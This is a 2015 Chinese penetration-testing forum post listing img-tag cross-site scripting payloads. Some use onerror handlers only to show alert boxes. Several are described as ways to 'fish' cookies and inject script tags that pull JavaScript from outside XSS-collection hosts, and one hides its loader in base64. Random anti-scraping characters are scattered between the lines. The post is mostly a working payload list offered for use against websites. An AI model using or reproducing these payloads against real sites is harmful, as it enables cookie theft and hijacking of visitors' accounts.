中国网络渗透测试联盟
标题:
img标签的常用几种测试手段
[打印本页]
作者:
admin
时间:
2015-10-18 14:33
标题:
img标签的常用几种测试手段
<img src='non-exist.jpg'onerror="alert('xss')">
. | s# H4 b/ K! c' g% a7 @" B
<img src=# onerror=alert(123)>
3 Z5 Q% r0 o5 |- I3 R7 u
<img src=# onerror=alert(document.cookie)>
! V9 g {0 S: P' L/ r
下面是利用平台钓cookie的
6 Z" N1 o' X# {$ {
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
( L- |# C {2 c9 y9 O. J
& k. @$ _7 ~1 n8 i$ D* L' M
0 `) g$ B0 t; b' G+ p
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
1 j4 S/ o$ G- L3 O. V' D
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
$ O& e# ~0 Q. G- H& H
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
; P+ g! h( i n2 c% D
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
4 J J% H: i. ^$ h. _2 h9 U# n
<img src="#">
" w6 H, @' F" i8 Z1 O$ F
<img src="#">
& X$ c1 i( u# w) G! D0 _. D7 E
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
, c# T9 D! z* n" c2 Y
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
% u$ n7 W* Q( t. h. w2 Z) n0 N
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
( N) Q7 ]) L! C; I9 {0 Q
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
4 `7 B. s5 v* t& x% J% ^: j# z: r
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
7 Y) f" x9 V) E `) R9 N
<img src=x width="0" height="0"></img>
d, D0 t, U7 ~5 F8 Q! d
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
+ O4 ?, ~8 \0 [2 O$ \) F
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
$ B; I. B% ~3 H. r i# m; O; k
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2